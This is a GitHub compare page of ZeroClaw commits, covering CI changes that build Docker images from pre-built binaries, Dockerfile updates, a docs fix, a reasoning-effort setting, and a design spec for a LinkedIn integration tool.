Compare commits

...

12 Commits

Author SHA1 Message Date
argenis de la rosa d41715b95e merge: resolve conflict with master in release workflow
Accept master's version of release-beta-on-push.yml which uses
pre-built binary artifacts instead of QEMU-based compilation.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-03-17 10:11:48 -04:00
argenis de la rosa b571cf4c81 feat(heartbeat): add structured task prompt, delivery formatting, and comprehensive edge-case tests
Replace the flat heartbeat prompt with a structured, non-conversational
prompt (build_task_prompt) that instructs tool usage and structured output.
Add format_delivery_output to prepend headers, handle empty output, and
truncate for channel safety. Wire allowed_tools config into the agent call.

Add ~85 edge-case tests across engine, store, and daemon covering malformed
metadata parsing, decision response parsing, metrics edge cases, adaptive
interval boundaries, store truncation/ordering, and delivery resolution.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-03-17 09:29:40 -04:00
Alix-007 3cf873ab85 fix(groq): fall back on tool validation 400s (#3778)
Co-authored-by: Alix-007 <267018309+Alix-007@users.noreply.github.com>
Co-authored-by: Argenis <theonlyhennygod@gmail.com>
2026-03-17 09:23:39 -04:00
Argenis 025724913d feat(runtime): add configurable reasoning effort (#3785)
* feat(runtime): add configurable reasoning effort

* fix(test): add missing reasoning_effort field in live test

Add reasoning_effort: None to ProviderRuntimeOptions construction in
openai_codex_vision_e2e.rs to fix E0063 compile error.

---------

Co-authored-by: Alix-007 <267018309+Alix-007@users.noreply.github.com>
2026-03-17 09:21:53 -04:00
project516 49dd4cd9da Change AppImage to tar.gz in arduino-uno-q-setup.md (#3754)
Arduino App Lab is a tar.gz file for Linux, not an AppImage

Co-authored-by: Argenis <theonlyhennygod@gmail.com>
2026-03-17 09:19:38 -04:00
dependabot[bot] 0664a5e854 chore(deps): bump rust from 7d37016 to da9dab7 (#3776)
Bumps rust from `7d37016` to `da9dab7`.

---
updated-dependencies:
- dependency-name: rust
  dependency-version: 1.94-slim
  dependency-type: direct:production
...

Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
Co-authored-by: Argenis <theonlyhennygod@gmail.com>
2026-03-17 09:16:21 -04:00
argenis de la rosa 22c271e21d fix(ci): skip Rust compilation in Docker by reusing matrix build artifacts
The multi-platform Docker build (linux/amd64 + linux/arm64) was compiling
Rust from source inside QEMU, taking 60+ minutes and frequently getting
cancelled. The matrix build job already produces native binaries for both
architectures — this change makes the Docker job use those pre-built
binaries instead.

Adds ARG PREBUILT_BINARY gating to Dockerfile and Dockerfile.debian so
CI skips cargo build and copies from a named build context, while local
docker build remains unchanged. Timeout reduced from 60 to 15 minutes.
2026-03-17 09:09:54 -04:00
Argenis acd09fbd86 feat(ci): use pre-built binaries for Docker images (#3784)
Instead of compiling Rust from source inside Docker (~60 min),
download the already-built linux binaries from the build matrix
and copy them into a minimal distroless image (~2 min).

- Add Dockerfile.ci for release workflows (no Rust toolchain needed)
- Update both beta and stable workflows to use pre-built artifacts
- Drop Docker job timeout from 60 to 15 minutes
- Original Dockerfile unchanged for local dev builds
2026-03-17 09:03:13 -04:00
Alix-007 0f7d1fceeb fix(channels): hide tool-call notifications by default (#3779)
Co-authored-by: Alix-007 <267018309+Alix-007@users.noreply.github.com>
Co-authored-by: Argenis <theonlyhennygod@gmail.com>
2026-03-17 08:52:49 -04:00
GhostC 01e13ac92d fix(skills): allow sibling markdown links within skills root (#3781)
Made-with: Cursor
2026-03-17 08:31:20 -04:00
Argenis a9a6113093 fix(docs): revert unauthorized CLAUDE.md additions from #3604 (#3761)
PR #3604 included CLAUDE.md changes referencing non-existent modules
(src/security/taint.rs, src/sop/workflow.rs) and duplicating content
from CONTRIBUTING.md. These additions violate the anti-pattern rule
against modifying CLAUDE.md in feature PRs.
2026-03-17 01:56:51 -04:00
Giulio V 906951a587 feat(multi): LinkedIn tool, WhatsApp voice notes, and Anthropic OAuth fix (#3604)
* feat(tools): add native LinkedIn integration tool

Add a config-gated LinkedIn tool that enables ZeroClaw to interact with
LinkedIn's REST API via OAuth2. Supports creating posts, listing own
posts, commenting, reacting, deleting posts, viewing engagement stats,
and retrieving profile info.

Architecture:
- linkedin.rs: Tool trait impl with action-dispatched design
- linkedin_client.rs: OAuth2 token management and API wrappers
- Config-gated via [linkedin] enabled = false (default off)
- Credentials loaded from workspace .env file
- Automatic token refresh with line-targeted .env update

39 unit tests covering security enforcement, parameter validation,
credential parsing, and token management.

* feat(linkedin): configurable content strategy and API version

- Expand LinkedInConfig with api_version and nested LinkedInContentConfig
  (rss_feeds, github_users, github_repos, topics, persona, instructions)
- Add get_content_strategy tool action so agents can read config at runtime
- Fix hardcoded LinkedIn API version 202402 (expired) → configurable,
  defaulting to 202602
- LinkedInClient accepts api_version as parameter instead of static header
- 4 new tests (43 total), all passing

* feat(linkedin): add multi-provider image generation for posts

Add ImageGenerator with provider chain (DALL-E, Stability AI, Imagen, Flux)
and SVG fallback card. LinkedIn tool create_post now supports generate_image
parameter. Includes LinkedIn image upload (register → upload → reference),
configurable provider priority, and 14 new tests.

* feat(whatsapp): add voice note transcription and TTS voice replies

- Add STT support: download incoming voice notes via wa-rs, transcribe
  with OpenAI Whisper (or Groq), send transcribed text to agent
- Add TTS support: synthesize agent replies to Opus audio via OpenAI
  TTS, upload encrypted media, send as WhatsApp voice note (ptt=true)
- Voice replies only trigger when user sends a voice note; text
  messages get text replies only. Flag is consumed after one use to
  prevent multiple voice notes per agent turn
- Fix transcription module to support OpenAI API key (not just Groq):
  auto-detect provider from API URL, check ANTHROPIC_OAUTH_TOKEN /
  OPENAI_API_KEY / GROQ_API_KEY env vars in priority order
- Add optional api_key field to TranscriptionConfig for explicit key
- Add response_format: opus to OpenAI TTS for WhatsApp compatibility
- Add channel capability note so agent knows TTS is automatic
- Wire transcription + TTS config into WhatsApp Web channel builder

* fix(providers): prefer ANTHROPIC_OAUTH_TOKEN over global api_key

When the Anthropic provider is used alongside a non-Anthropic primary
provider (e.g. custom: gateway), the global api_key would be passed
as credential override, bypassing provider-specific env vars. This
caused Claude Code subscription tokens (sk-ant-oat01-*) to be ignored
in favor of the unrelated gateway JWT.

Fix: for the anthropic provider, check ANTHROPIC_OAUTH_TOKEN and
ANTHROPIC_API_KEY env vars before falling back to the credential
override. This mirrors the existing MiniMax OAuth pattern and enables
subscription-based auth to work as a fallback provider.

* feat(linkedin): add scheduled post support via LinkedIn API

Add scheduled_at parameter to create_post and create_post_with_image.
When provided (RFC 3339 timestamp), the post is created as a DRAFT
with scheduledPublishOptions so LinkedIn publishes it automatically
at the specified time. This enables the cron job to schedule a week
of posts in advance directly on LinkedIn.

* fix(providers): prefer env vars for openai and groq credential resolution

Generalize the Anthropic OAuth fix to also cover openai and groq
providers. When used alongside a non-matching primary provider (e.g.
a custom: gateway), the global api_key would be passed as credential
override, causing auth failures. Now checks provider-specific env
vars (OPENAI_API_KEY, GROQ_API_KEY) before falling back to the
credential override.

* fix(whatsapp): debounce voice replies to voice final answer only

The voice note TTS was triggering on the first send() call, which was
often intermediate tool output (URLs, JSON, web fetch results) rather
than the actual answer. This produced incomprehensible voice notes.

Fix: accumulate substantive replies (>30 chars, not URLs/JSON/code)
in a pending_voice map. A spawned debounce task waits 4 seconds after
the last substantive message, then synthesizes and sends ONE voice
note with the final answer. Intermediate tool outputs are skipped.

This ensures the user hears the actual answer in the correct language,
not raw tool output in English.

* fix(whatsapp): voice in = voice out, text in = text out

Rewrite voice reply logic with clean separation:
- Voice note received: ALL text output suppressed. Latest message
  accumulated silently. After 5s of no new messages, ONE voice note
  sent with the final answer. No tool outputs, no text, just voice.
- Text received: normal text reply, no voice.

Atomic debounce: multiple spawned tasks race but only one can extract
the pending message (remove-inside-lock pattern). Prevents duplicate
voice notes.

* fix(whatsapp): voice replies send both text and voice note

Voice note in → text replies sent normally in real-time PLUS one
voice note with the final answer after 10s debounce. Only substantive
natural-language messages are voiced (tool outputs, URLs, JSON, code
blocks filtered out). Longer debounce (10s) ensures the agent
completes its full tool chain before the voice note fires.

Text in → text out only, no voice.

* fix(channels): suppress tool narration and ack reactions

- Add system prompt instruction telling the agent to NEVER narrate
  tool usage (no "Let me fetch..." or "I will use http_request...")
- Disable ack_reactions (emoji reactions on incoming messages)
- Users see only the final answer, no intermediate steps

* docs(claude): add full CONTRIBUTING.md guidelines to CLAUDE.md

Add PR template requirements, code naming conventions, architecture
boundary rules, validation commands, and branch naming guidance
directly to CLAUDE.md for AI assistant reference.

* fix(docs): add blank lines around headings in CLAUDE.md for markdown lint

* fix(channels): strengthen tool narration suppression and fix large_futures

- Move anti-narration instruction to top of channel system prompt
- Add emphatic instruction for WhatsApp/voice channels specifically
- Add outbound message filter to strip tool-call-like patterns (, 🔧)
- Box::pin the two-phase heartbeat agent::run call (16664 bytes on Linux)
2026-03-17 01:55:05 -04:00
27 changed files with 5383 additions and 159 deletions
+35 -4
View File
@@ -294,10 +294,43 @@ jobs:
name: Push Docker Image
needs: [version, build]
runs-on: ubuntu-latest
timeout-minutes: 60
timeout-minutes: 15
steps:
- uses: actions/checkout@34e114876b0b11c390a56381ad16ebd13914f8d5 # v4
- uses: actions/download-artifact@d3f86a106a0bac45b974a628896c90dbdf5c8093 # v4
with:
name: zeroclaw-x86_64-unknown-linux-gnu
path: artifacts/
- uses: actions/download-artifact@d3f86a106a0bac45b974a628896c90dbdf5c8093 # v4
with:
name: zeroclaw-aarch64-unknown-linux-gnu
path: artifacts/
- name: Prepare Docker context with pre-built binaries
run: |
mkdir -p docker-ctx/bin/amd64 docker-ctx/bin/arm64
tar xzf artifacts/zeroclaw-x86_64-unknown-linux-gnu.tar.gz -C docker-ctx/bin/amd64
tar xzf artifacts/zeroclaw-aarch64-unknown-linux-gnu.tar.gz -C docker-ctx/bin/arm64
mkdir -p docker-ctx/zeroclaw-data/.zeroclaw docker-ctx/zeroclaw-data/workspace
printf '%s\n' \
'workspace_dir = "/zeroclaw-data/workspace"' \
'config_path = "/zeroclaw-data/.zeroclaw/config.toml"' \
'api_key = ""' \
'default_provider = "openrouter"' \
'default_model = "anthropic/claude-sonnet-4-20250514"' \
'default_temperature = 0.7' \
'' \
'[gateway]' \
'port = 42617' \
'host = "[::]"' \
'allow_public_bind = true' \
> docker-ctx/zeroclaw-data/.zeroclaw/config.toml
cp Dockerfile.ci docker-ctx/Dockerfile
- uses: docker/setup-buildx-action@8d2750c68a42422c14e847fe6c8ac0403b4cbd6f # v3
- uses: docker/login-action@c94ce9fb468520275223c153574b00df6fe4bcc9 # v3
@@ -309,14 +342,12 @@ jobs:
- name: Build and push
uses: docker/build-push-action@10e90e3645eae34f1e60eeb005ba3a3d33f178e8 # v6
with:
context: .
context: docker-ctx
push: true
tags: |
${{ env.REGISTRY }}/${{ env.IMAGE_NAME }}:${{ needs.version.outputs.tag }}
${{ env.REGISTRY }}/${{ env.IMAGE_NAME }}:beta
platforms: linux/amd64,linux/arm64
cache-from: type=gha
cache-to: type=gha,mode=max
# ── Post-publish: tweet after release + website are live ──────────────
# Docker is slow (multi-platform) and can be cancelled by concurrency;
+35 -4
View File
@@ -337,10 +337,43 @@ jobs:
name: Push Docker Image
needs: [validate, build]
runs-on: ubuntu-latest
timeout-minutes: 60
timeout-minutes: 15
steps:
- uses: actions/checkout@34e114876b0b11c390a56381ad16ebd13914f8d5 # v4
- uses: actions/download-artifact@d3f86a106a0bac45b974a628896c90dbdf5c8093 # v4
with:
name: zeroclaw-x86_64-unknown-linux-gnu
path: artifacts/
- uses: actions/download-artifact@d3f86a106a0bac45b974a628896c90dbdf5c8093 # v4
with:
name: zeroclaw-aarch64-unknown-linux-gnu
path: artifacts/
- name: Prepare Docker context with pre-built binaries
run: |
mkdir -p docker-ctx/bin/amd64 docker-ctx/bin/arm64
tar xzf artifacts/zeroclaw-x86_64-unknown-linux-gnu.tar.gz -C docker-ctx/bin/amd64
tar xzf artifacts/zeroclaw-aarch64-unknown-linux-gnu.tar.gz -C docker-ctx/bin/arm64
mkdir -p docker-ctx/zeroclaw-data/.zeroclaw docker-ctx/zeroclaw-data/workspace
printf '%s\n' \
'workspace_dir = "/zeroclaw-data/workspace"' \
'config_path = "/zeroclaw-data/.zeroclaw/config.toml"' \
'api_key = ""' \
'default_provider = "openrouter"' \
'default_model = "anthropic/claude-sonnet-4-20250514"' \
'default_temperature = 0.7' \
'' \
'[gateway]' \
'port = 42617' \
'host = "[::]"' \
'allow_public_bind = true' \
> docker-ctx/zeroclaw-data/.zeroclaw/config.toml
cp Dockerfile.ci docker-ctx/Dockerfile
- uses: docker/setup-buildx-action@8d2750c68a42422c14e847fe6c8ac0403b4cbd6f # v3
- uses: docker/login-action@c94ce9fb468520275223c153574b00df6fe4bcc9 # v3
@@ -352,14 +385,12 @@ jobs:
- name: Build and push
uses: docker/build-push-action@10e90e3645eae34f1e60eeb005ba3a3d33f178e8 # v6
with:
context: .
context: docker-ctx
push: true
tags: |
${{ env.REGISTRY }}/${{ env.IMAGE_NAME }}:${{ needs.validate.outputs.tag }}
${{ env.REGISTRY }}/${{ env.IMAGE_NAME }}:latest
platforms: linux/amd64,linux/arm64
cache-from: type=gha
cache-to: type=gha,mode=max
# ── Post-publish: package manager auto-sync ─────────────────────────
scoop:
+33 -15
View File
@@ -1,7 +1,13 @@
# syntax=docker/dockerfile:1.7
# Pre-built CI binaries context (empty locally; overridden via --build-context in CI)
FROM scratch AS ci-binaries
# ── Stage 1: Build ────────────────────────────────────────────
FROM rust:1.94-slim@sha256:7d3701660d2aa7101811ba0c54920021452aa60e5bae073b79c2b137a432b2f4 AS builder
FROM rust:1.94-slim@sha256:da9dab7a6b8dd428e71718402e97207bb3e54167d37b5708616050b1e8f60ed6 AS builder
ARG PREBUILT_BINARY=""
ARG TARGETARCH
WORKDIR /app
@@ -16,16 +22,22 @@ RUN --mount=type=cache,target=/var/cache/apt,sharing=locked \
COPY Cargo.toml Cargo.lock ./
COPY crates/robot-kit/Cargo.toml crates/robot-kit/Cargo.toml
# Create dummy targets declared in Cargo.toml so manifest parsing succeeds.
RUN mkdir -p src benches crates/robot-kit/src \
&& echo "fn main() {}" > src/main.rs \
&& echo "" > src/lib.rs \
&& echo "fn main() {}" > benches/agent_benchmarks.rs \
&& echo "pub fn placeholder() {}" > crates/robot-kit/src/lib.rs
RUN if [ -z "$PREBUILT_BINARY" ]; then \
mkdir -p src benches crates/robot-kit/src && \
echo "fn main() {}" > src/main.rs && \
echo "" > src/lib.rs && \
echo "fn main() {}" > benches/agent_benchmarks.rs && \
echo "pub fn placeholder() {}" > crates/robot-kit/src/lib.rs; \
fi
RUN --mount=type=cache,id=zeroclaw-cargo-registry,target=/usr/local/cargo/registry,sharing=locked \
--mount=type=cache,id=zeroclaw-cargo-git,target=/usr/local/cargo/git,sharing=locked \
--mount=type=cache,id=zeroclaw-target,target=/app/target,sharing=locked \
cargo build --release --locked
RUN rm -rf src benches crates/robot-kit/src
if [ -z "$PREBUILT_BINARY" ]; then \
cargo build --release --locked; \
fi
RUN if [ -z "$PREBUILT_BINARY" ]; then \
rm -rf src benches crates/robot-kit/src; \
fi
# 2. Copy only build-relevant source paths (avoid cache-busting on docs/tests/scripts)
COPY src/ src/
@@ -51,16 +63,22 @@ RUN mkdir -p web/dist && \
' </body>' \
'</html>' > web/dist/index.html; \
fi
RUN touch src/main.rs
RUN if [ -z "$PREBUILT_BINARY" ]; then touch src/main.rs; fi
RUN --mount=type=cache,id=zeroclaw-cargo-registry,target=/usr/local/cargo/registry,sharing=locked \
--mount=type=cache,id=zeroclaw-cargo-git,target=/usr/local/cargo/git,sharing=locked \
--mount=type=cache,id=zeroclaw-target,target=/app/target,sharing=locked \
rm -rf target/release/.fingerprint/zeroclawlabs-* \
target/release/deps/zeroclawlabs-* \
target/release/incremental/zeroclawlabs-* && \
cargo build --release --locked && \
cp target/release/zeroclaw /app/zeroclaw && \
strip /app/zeroclaw
--mount=from=ci-binaries,target=/ci-bin \
if [ -z "$PREBUILT_BINARY" ]; then \
rm -rf target/release/.fingerprint/zeroclawlabs-* \
target/release/deps/zeroclawlabs-* \
target/release/incremental/zeroclawlabs-* && \
cargo build --release --locked && \
cp target/release/zeroclaw /app/zeroclaw && \
strip /app/zeroclaw; \
else \
cp "/ci-bin/${TARGETARCH}/zeroclaw" /app/zeroclaw && \
strip /app/zeroclaw; \
fi
RUN size=$(stat -c%s /app/zeroclaw 2>/dev/null || stat -f%z /app/zeroclaw) && \
if [ "$size" -lt 1000000 ]; then echo "ERROR: binary too small (${size} bytes), likely dummy build artifact" && exit 1; fi
+25
View File
@@ -0,0 +1,25 @@
# Dockerfile.ci — CI/release image using pre-built binaries.
# Used by release workflows to skip the ~60 min Rust compilation.
# The main Dockerfile is still used for local dev builds.
# ── Runtime (Distroless) ─────────────────────────────────────
FROM gcr.io/distroless/cc-debian13:nonroot@sha256:84fcd3c223b144b0cb6edc5ecc75641819842a9679a3a58fd6294bec47532bf7
ARG TARGETARCH
# Copy the pre-built binary for this platform (amd64 or arm64)
COPY bin/${TARGETARCH}/zeroclaw /usr/local/bin/zeroclaw
# Runtime directory structure and default config
COPY --chown=65534:65534 zeroclaw-data/ /zeroclaw-data/
ENV LANG=C.UTF-8
ENV ZEROCLAW_WORKSPACE=/zeroclaw-data/workspace
ENV HOME=/zeroclaw-data
ENV ZEROCLAW_GATEWAY_PORT=42617
WORKDIR /zeroclaw-data
USER 65534:65534
EXPOSE 42617
ENTRYPOINT ["zeroclaw"]
CMD ["gateway"]
+30 -12
View File
@@ -15,8 +15,14 @@
# Or with docker compose:
# docker compose -f docker-compose.yml -f docker-compose.debian.yml up
# Pre-built CI binaries context (empty locally; overridden via --build-context in CI)
FROM scratch AS ci-binaries
# ── Stage 1: Build (identical to main Dockerfile) ───────────
FROM rust:1.94-slim@sha256:7d3701660d2aa7101811ba0c54920021452aa60e5bae073b79c2b137a432b2f4 AS builder
FROM rust:1.94-slim@sha256:da9dab7a6b8dd428e71718402e97207bb3e54167d37b5708616050b1e8f60ed6 AS builder
ARG PREBUILT_BINARY=""
ARG TARGETARCH
WORKDIR /app
@@ -31,16 +37,22 @@ RUN --mount=type=cache,target=/var/cache/apt,sharing=locked \
COPY Cargo.toml Cargo.lock ./
COPY crates/robot-kit/Cargo.toml crates/robot-kit/Cargo.toml
# Create dummy targets declared in Cargo.toml so manifest parsing succeeds.
RUN mkdir -p src benches crates/robot-kit/src \
&& echo "fn main() {}" > src/main.rs \
&& echo "" > src/lib.rs \
&& echo "fn main() {}" > benches/agent_benchmarks.rs \
&& echo "pub fn placeholder() {}" > crates/robot-kit/src/lib.rs
RUN if [ -z "$PREBUILT_BINARY" ]; then \
mkdir -p src benches crates/robot-kit/src && \
echo "fn main() {}" > src/main.rs && \
echo "" > src/lib.rs && \
echo "fn main() {}" > benches/agent_benchmarks.rs && \
echo "pub fn placeholder() {}" > crates/robot-kit/src/lib.rs; \
fi
RUN --mount=type=cache,id=zeroclaw-cargo-registry,target=/usr/local/cargo/registry,sharing=locked \
--mount=type=cache,id=zeroclaw-cargo-git,target=/usr/local/cargo/git,sharing=locked \
--mount=type=cache,id=zeroclaw-target,target=/app/target,sharing=locked \
cargo build --release --locked
RUN rm -rf src benches crates/robot-kit/src
if [ -z "$PREBUILT_BINARY" ]; then \
cargo build --release --locked; \
fi
RUN if [ -z "$PREBUILT_BINARY" ]; then \
rm -rf src benches crates/robot-kit/src; \
fi
# 2. Copy only build-relevant source paths (avoid cache-busting on docs/tests/scripts)
COPY src/ src/
@@ -65,13 +77,19 @@ RUN mkdir -p web/dist && \
' </body>' \
'</html>' > web/dist/index.html; \
fi
RUN touch src/main.rs
RUN if [ -z "$PREBUILT_BINARY" ]; then touch src/main.rs; fi
RUN --mount=type=cache,id=zeroclaw-cargo-registry,target=/usr/local/cargo/registry,sharing=locked \
--mount=type=cache,id=zeroclaw-cargo-git,target=/usr/local/cargo/git,sharing=locked \
--mount=type=cache,id=zeroclaw-target,target=/app/target,sharing=locked \
cargo build --release --locked && \
cp target/release/zeroclaw /app/zeroclaw && \
strip /app/zeroclaw
--mount=from=ci-binaries,target=/ci-bin \
if [ -z "$PREBUILT_BINARY" ]; then \
cargo build --release --locked && \
cp target/release/zeroclaw /app/zeroclaw && \
strip /app/zeroclaw; \
else \
cp "/ci-bin/${TARGETARCH}/zeroclaw" /app/zeroclaw && \
strip /app/zeroclaw; \
fi
RUN size=$(stat -c%s /app/zeroclaw 2>/dev/null || stat -f%z /app/zeroclaw) && \
if [ "$size" -lt 1000000 ]; then echo "ERROR: binary too small (${size} bytes), likely dummy build artifact" && exit 1; fi
+1 -1
View File
@@ -31,7 +31,7 @@ Build with `--features hardware` to include Uno Q support.
### 1.1 Configure Uno Q via App Lab
1. Download [Arduino App Lab](https://docs.arduino.cc/software/app-lab/) (AppImage on Linux).
1. Download [Arduino App Lab](https://docs.arduino.cc/software/app-lab/) (tar.gz on Linux).
2. Connect Uno Q via USB, power it on.
3. Open App Lab, connect to the board.
4. Follow the setup wizard:
@@ -0,0 +1,314 @@
# LinkedIn Tool — Design Spec
**Date:** 2026-03-13
**Status:** Approved
**Risk tier:** Medium (new tool, external API, credential handling)
## Summary
Native LinkedIn integration tool for ZeroClaw. Enables the agent to create posts,
list its own posts, comment, react, delete posts, view post engagement, and retrieve
profile info — all through LinkedIn's official REST API with OAuth2 authentication.
## Motivation
Enable ZeroClaw to autonomously publish LinkedIn content on a schedule (via cron),
drawing from the user's memory, project history, and Medium feed. Removes dependency
on third-party platforms like Composio for social media posting.
## Required OAuth2 scopes
Users must grant these scopes when creating their LinkedIn Developer App:
| Scope | Required for |
|---|---|
| `w_member_social` | `create_post`, `comment`, `react`, `delete_post` |
| `r_liteprofile` | `get_profile` |
| `r_member_social` | `list_posts`, `get_engagement` |
The "Share on LinkedIn" and "Sign In with LinkedIn using OpenID Connect" products
must be requested in the LinkedIn Developer App dashboard (both auto-approve).
## Architecture
### File structure
| File | Role |
|---|---|
| `src/tools/linkedin.rs` | `Tool` trait impl, action dispatch, parameter validation |
| `src/tools/linkedin_client.rs` | OAuth2 token management, LinkedIn REST API wrappers |
| `src/tools/mod.rs` | Module declaration, pub use, registration in `all_tools_with_runtime` |
| `src/config/schema.rs` | `[linkedin]` config section (`LinkedInConfig`) |
| `src/config/mod.rs` | Add `LinkedInConfig` to pub use exports |
### No new dependencies
All required crates are already in `Cargo.toml`: `reqwest` (HTTP), `serde`/`serde_json`
(serialization), `chrono` (timestamps), `tokio` (async fs for .env reading).
## Config
### `config.toml`
```toml
[linkedin]
enabled = false
```
### `.env` credentials
```bash
LINKEDIN_CLIENT_ID=your_client_id
LINKEDIN_CLIENT_SECRET=your_client_secret
LINKEDIN_ACCESS_TOKEN=your_access_token
LINKEDIN_REFRESH_TOKEN=your_refresh_token
LINKEDIN_PERSON_ID=your_person_urn_id
```
Token format: `LINKEDIN_PERSON_ID` is the bare ID (e.g., `dXNlcjpA...`), not the
full URN. The client prefixes `urn:li:person:` internally.
## Tool design
### Single tool, action-dispatched
Tool name: `linkedin`
The LLM calls it with an `action` field and action-specific parameters:
```json
{ "action": "create_post", "text": "...", "visibility": "PUBLIC" }
```
### Actions
| Action | Params | API | Write? |
|---|---|---|---|
| `create_post` | `text`, `visibility?` (PUBLIC/CONNECTIONS, default PUBLIC), `article_url?`, `article_title?` | `POST /rest/posts` | Yes |
| `list_posts` | `count?` (default 10, max 50) | `GET /rest/posts?author={personUrn}&q=author` | No |
| `comment` | `post_id`, `text` | `POST /rest/socialActions/{id}/comments` | Yes |
| `react` | `post_id`, `reaction_type` (LIKE/CELEBRATE/SUPPORT/LOVE/INSIGHTFUL/FUNNY) | `POST /rest/reactions?actor={actorUrn}` | Yes |
| `delete_post` | `post_id` | `DELETE /rest/posts/{id}` | Yes |
| `get_engagement` | `post_id` | `GET /rest/socialActions/{id}` | No |
| `get_profile` | (none) | `GET /rest/me` | No |
Note: `list_posts` queries posts authored by the authenticated user (not a home feed —
LinkedIn does not expose a home feed API). `get_engagement` returns likes/comments/shares
counts for a specific post via the socialActions endpoint.
### Security enforcement
- Write actions (`create_post`, `comment`, `react`, `delete_post`): check `security.can_act()` + `security.record_action()`
- Read actions (`list_posts`, `get_engagement`, `get_profile`): still call `record_action()` for rate tracking
### Parameter validation
- `article_title` without `article_url` returns error: "article_title requires article_url"
- `react` requires both `post_id` and `reaction_type`
- `comment` requires both `post_id` and `text`
- `create_post` requires `text` (non-empty)
### Parameter schema
```json
{
"type": "object",
"properties": {
"action": {
"type": "string",
"enum": ["create_post", "list_posts", "comment", "react", "delete_post", "get_engagement", "get_profile"],
"description": "The LinkedIn action to perform"
},
"text": {
"type": "string",
"description": "Post or comment text content"
},
"visibility": {
"type": "string",
"enum": ["PUBLIC", "CONNECTIONS"],
"description": "Post visibility (default: PUBLIC)"
},
"article_url": {
"type": "string",
"description": "URL to attach as article/link preview"
},
"article_title": {
"type": "string",
"description": "Title for the attached article (requires article_url)"
},
"post_id": {
"type": "string",
"description": "LinkedIn post URN for comment/react/delete/engagement"
},
"reaction_type": {
"type": "string",
"enum": ["LIKE", "CELEBRATE", "SUPPORT", "LOVE", "INSIGHTFUL", "FUNNY"],
"description": "Reaction type for the react action"
},
"count": {
"type": "integer",
"description": "Number of posts to retrieve (default 10, max 50)"
}
},
"required": ["action"]
}
```
## LinkedIn client
### `LinkedInClient` struct
```rust
pub struct LinkedInClient {
workspace_dir: PathBuf,
}
```
Uses `crate::config::build_runtime_proxy_client_with_timeouts("tool.linkedin", 30, 10)`
per request (same pattern as Pushover), respecting runtime proxy configuration.
### Credential loading
Same pattern as `PushoverTool`: reads `.env` from `workspace_dir`, parses key-value
pairs, supports `export` prefix and quoted values.
### Token refresh
1. All API calls use `LINKEDIN_ACCESS_TOKEN` in `Authorization: Bearer` header
2. On 401 response, attempt token refresh:
- `POST https://www.linkedin.com/oauth/v2/accessToken`
- Body: `grant_type=refresh_token&refresh_token=...&client_id=...&client_secret=...`
3. On successful refresh, update `LINKEDIN_ACCESS_TOKEN` in `.env` file via
line-targeted replacement (read all lines, replace the matching key line, write back).
Preserves `export` prefixes, quoting style, comments, and all other keys.
4. Retry the original request once
5. If refresh also fails, return error with clear message about re-authentication
### API versioning
All requests include:
- `LinkedIn-Version: 202402` header (stable version)
- `X-Restli-Protocol-Version: 2.0.0` header
- `Content-Type: application/json`
### React endpoint details
The `react` action sends:
- `POST /rest/reactions?actor=urn:li:person:{personId}`
- Body: `{"reactionType": "LIKE", "object": "urn:li:ugcPost:{postId}"}`
The actor URN is derived from `LINKEDIN_PERSON_ID` in `.env`.
### Response parsing
The client returns structured data types:
```rust
pub struct PostSummary {
pub id: String,
pub text: String,
pub created_at: String,
pub visibility: String,
}
pub struct ProfileInfo {
pub id: String,
pub name: String,
pub headline: String,
}
pub struct EngagementSummary {
pub likes: u64,
pub comments: u64,
pub shares: u64,
}
```
## Registration
In `src/tools/mod.rs` (follows `security_ops` config-gated pattern):
```rust
// Module declarations
pub mod linkedin;
pub mod linkedin_client;
// Re-exports
pub use linkedin::LinkedInTool;
// In all_tools_with_runtime():
if root_config.linkedin.enabled {
tool_arcs.push(Arc::new(LinkedInTool::new(
security.clone(),
workspace_dir.to_path_buf(),
)));
}
```
## Config schema
In `src/config/schema.rs`:
```rust
#[derive(Debug, Clone, Serialize, Deserialize, JsonSchema)]
pub struct LinkedInConfig {
pub enabled: bool,
}
impl Default for LinkedInConfig {
fn default() -> Self {
Self { enabled: false }
}
}
```
Added as field `pub linkedin: LinkedInConfig` on the `Config` struct.
Added to `pub use` exports in `src/config/mod.rs`.
## Testing
### Unit tests (in `linkedin.rs`)
- Tool name, description, schema validation
- Action dispatch routes correctly
- Write actions blocked in read-only mode
- Write actions blocked by rate limiting
- Missing required params return clear errors
- Unknown action returns error
- `article_title` without `article_url` returns validation error
### Unit tests (in `linkedin_client.rs`)
- Credential parsing from `.env` (plain, quoted, export prefix, comments)
- Missing credential fields produce specific errors
- Token refresh writes updated token back to `.env` preserving other keys
- Post creation builds correct request body with URN formatting
- React builds correct query param with actor URN
- Visibility defaults to PUBLIC when omitted
### Registry tests (in `mod.rs`)
- `all_tools` excludes `linkedin` when `linkedin.enabled = false`
- `all_tools` includes `linkedin` when `linkedin.enabled = true`
### Integration tests
Not added in this PR — would require live LinkedIn API credentials.
A `#[cfg(feature = "test-linkedin-live")]` gate can be added later.
## Error handling
- Missing `.env` file: "LinkedIn credentials not found. Add LINKEDIN_* keys to .env"
- Missing specific key: "LINKEDIN_ACCESS_TOKEN not found in .env"
- Expired token + no refresh token: "LinkedIn token expired. Re-authenticate or add LINKEDIN_REFRESH_TOKEN to .env"
- `article_title` without `article_url`: "article_title requires article_url to be set"
- API errors: pass through LinkedIn's error message with status code
- Rate limited by LinkedIn: "LinkedIn API rate limit exceeded. Try again later."
- Missing scope: "LinkedIn API returned 403. Ensure your app has the required scopes: w_member_social, r_liteprofile, r_member_social"
## PR metadata
- **Branch:** `feature/linkedin-tool`
- **Title:** `feat(tools): add native LinkedIn integration tool`
- **Risk:** Medium — new tool, external API, no security boundary changes
- **Size target:** M (2 new files ~200-300 lines each, 3-4 modified files)
+2
View File
@@ -3211,6 +3211,7 @@ pub async fn run(
zeroclaw_dir: config.config_path.parent().map(std::path::PathBuf::from),
secrets_encrypt: config.secrets.encrypt,
reasoning_enabled: config.runtime.reasoning_enabled,
reasoning_effort: config.runtime.reasoning_effort.clone(),
provider_timeout_secs: Some(config.provider_timeout_secs),
extra_headers: config.extra_headers.clone(),
api_path: config.api_path.clone(),
@@ -3791,6 +3792,7 @@ pub async fn process_message(
zeroclaw_dir: config.config_path.parent().map(std::path::PathBuf::from),
secrets_encrypt: config.secrets.encrypt,
